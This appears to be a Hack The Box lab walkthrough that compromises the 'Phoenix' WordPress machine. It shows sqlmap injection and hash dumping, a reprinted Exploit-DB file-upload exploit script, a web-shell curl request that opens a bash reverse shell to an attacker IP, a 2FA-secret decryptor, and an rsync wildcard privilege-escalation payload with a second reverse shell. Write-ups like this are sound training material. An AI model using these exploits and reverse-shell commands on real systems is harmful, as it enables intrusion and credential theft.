Hack_The_Box_Writeups

HackTheBox – Phoenix Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap –A 10.10.11.149

https://phoenix.htb/

Click on details -> click on Go to Blog.

https://phoenix.htb/?post_type=post

Now click on Forums.

https://phoenix.htb/forum/

https://phoenix.htb/forum/members/

┌──(root㉿kali)-[/home/kali/Downloads]

└─# wpscan –url https://phoenix.htb/ –disable-tls-checks –enumerate u

https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1

┌──(root㉿kali)-[/home/kali/Downloads]

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sqlmap –url https://phoenix.htb/forum/?subscribe_topic=1 –level 3 –risk 3 –batch -DBMS MySQL -dbs

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sqlmap –url https://phoenix.htb/forum/?subscribe_topic=1 –level 3 –risk 3 –batch -DBMS MySQL -D wordpress –tables

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sqlmap –url https://phoenix.htb/forum/?subscribe_topic=1 –level 3 –risk 3 –batch -DBMS MySQL -D wordpress -T wp_users –columns

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sqlmap –url https://phoenix.htb/forum/?subscribe_topic=1 –level 3 –risk 3 –batch -DBMS MySQL -D wordpress -T wp_users -C user_login,user_pass –dump

┌──(root㉿kali)-[/home/kali/Downloads]

└─# john hash –wordlist=rockyou.txt

We get the cred

superphoenix

https://www.exploit-db.com/raw/50287

Content:

# Exploit Title: WordPress Plugin Download From Files 1.48 – Arbitrary File Upload

# Google Dork: inurl:/wp-content/plugins/download-from-files

# Date: 10/09/2021

# Exploit Author: spacehen

# Vendor Homepage: https://wordpress.org/plugins/download-from-files/

# Version: <= 1.48

# Tested on: Ubuntu 20.04.1 LTS (x86)

import os.path

from os import path

import json

import requests

import sys

def print_banner():

                print(“Download From Files <= 1.48 – Arbitrary File Upload”)

                print(“Author -> spacehen (www.github.com/spacehen)”)

def print_usage():

                print(“Usage: python3 exploit.py [target url] [php file]”)

                print(“Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)”)

def vuln_check(uri):

                response = requests.get(uri, verify=False)

                raw = response.text

                if (“Sikeres” in raw):

                                return True;

                else:

                                return False;

def main():

                print_banner()

                if(len(sys.argv) != 3):

                                print_usage();

                                sys.exit(1);

                base = sys.argv[1]

                file_path = sys.argv[2]

                ajax_action = ‘download_from_files_617_fileupload’

                admin = ‘/wp-admin/admin-ajax.php’;

                uri = base + admin + ‘?action=’ + ajax_action ;

                check = vuln_check(uri);

                if(check == False):

                                print(“(*) Target not vulnerable!”);

                                sys.exit(1)

                if( path.isfile(file_path) == False):

                                print(“(*) Invalid file!”)

                                sys.exit(1)

                files = {‘files[]’ : open(file_path)}

                data = {

                “allowExt” : “php4,phtml”,

                “filesName” : “files”,

    “maxSize” : “1000”,

    “uploadDir” : “.”

                }

                print(“Uploading Shell…”);

                response = requests.post(uri, files=files, data=data, verify=False)

                file_name = path.basename(file_path)

                if(“ok” in response.text):

                                print(“Shell Uploaded!”)

                                if(base[-1] != ‘/’):

                                                base += ‘/’

                                print(base + “wp-admin/” + file_name);

                else:

                                print(“Shell Upload Failed”)

                                sys.exit(1)

main()

┌──(root㉿kali)-[/home/kali/Downloads]

└─# cat shell.phtml

┌──(root㉿kali)-[/home/kali/Downloads]

└─# python3 exploit.py https://phoenix.htb/ shell.phtml

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nc -nlvp 1234             

┌──(root㉿kali)-[/home/kali/Downloads]

└─# curl -k https://phoenix.htb/wp-admin/shell.phtml –data-urlencode ‘cmd=bash -c “bash -i >& /dev/tcp/10.10.14.102/1234 0>&1″‘

bash-5.0$ cd /opt

bash-5.0$ ls –lrt

bash-5.0$ cd wordpress

GET OPT KEY

we find there is a 2FA auth in /wp-admin login page, we try to figure it out how to bypass it, or just get the OTP key:

and we found encrypt and decrypt functions from the source of that miniorange plugin at handler/twofa/two_fa_utility.php

then We can grab the wordpress login from the wp-config.php file:

bash-5.0$ cd ..

bash-5.0$ cat wp-config.php

Password: <++32%himself%FIRM%section%32++>

then connect to mysql to get more information:

bash-5.0$ script /dev/null -c bash

bash-5.0$ mysql -uwordpress –p

Enter password: <++32%himself%FIRM%section%32++>

mysql> show databases;

mysql> use wordpress;

mysql> select meta_value from wp_usermeta WHERE meta_key IN (‘mo2f_gauth_key’);

mysql> select meta_value from wp_usermeta WHERE meta_key IN (‘mo2f_get_auth_rnd_string’);

and then easily write an decrypt exp php file to get the key:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# cat epp.php

Content:

<?php

function decrypt_data($data, $key) {

                $c = base64_decode($data);

                $ivlen = openssl_cipher_iv_length($cipher=”AES-128-CBC”);

                $iv = substr($c, 0, $ivlen);

                $hmac = substr($c, $ivlen, $sha2len=32);

                $ciphertext_raw = substr($c, $ivlen+$sha2len);

                $original_plaintext = openssl_decrypt($ciphertext_raw, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv);

                $calcmac = hash_hmac(‘sha256’, $ciphertext_raw, $key, $as_binary=true);

                return $original_plaintext;

        }

echo decrypt_data(“qGEPwI6RQBxF4aXM6PVuriofiwCH4mjc4ZjO3jWN5gDDX5MzLHTfDk3tRGK7vwkkTbAjoxNfqFeMjJZoSI5yPF25Hd5b8lSaF/Dpc6WMBTA=”,”kHHxxX3f”);

?>

┌──(root㉿kali)-[/home/kali/Downloads]

└─# php epp.php

bash-5.0$ cd /etc/pam.d

bash-5.0$ ls

We can completely bypass the 2FA by renaming the plugin over at /opt/wordpress/ but it doesn’t get us much further than we already are.

Instead back to using SSH, we can look into bypassing the 2FA completely (for ssh this time, not wordpress), in the /etc/pam.d/ssh config, we see reference to an accessfile:

read more about it:

https://manpages.ubuntu.com/manpages/bionic/man8/pam_google_authenticator.8.html

bash-5.0$ cat /etc/security/access-local.conf

We need to connect from an IP on the 10.11.2.13/24 subnet, which we can’t do from our machine or locally from the other machine. so we use ssh command in the wp_user shell:

We finally SSH over to the box, reusing editor‘s password:

bash-5.0$ ssh editor@10.11.12.13

Password: superphoenix

-bash-5.0$ id

-bash-5.0$ cd /home

-bash-5.0$ ls –lrt

-bash-5.0$ cd editor

-bash-5.0$ cat user.txt

-bash-5.0$ cd /dev/shm

-bash-5.0$ find /usr/local/bin/ -perm -o=x -type f 2>/dev/null

-bash-5.0$ file /usr/local/bin/cron.sh.x

https://gtfobins.github.io/gtfobins/rsync/

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nc -nlvp 443

-bash-5.0$ cd /backups

-bash-5.0$ file /usr/local/bin/cron.sh.x

-bash-5.0$ cd /usr/local/bin

-bash-5.0$ ./cron.sh.x

And in another session on pspy we can see the hits.

-bash-5.0$ echo -e ‘#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.102/443 0>&1’ > test.sh; touch — ‘-e bash test.sh’

-bash-5.0$ ls –la

After 3 minute we get the root shell.

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *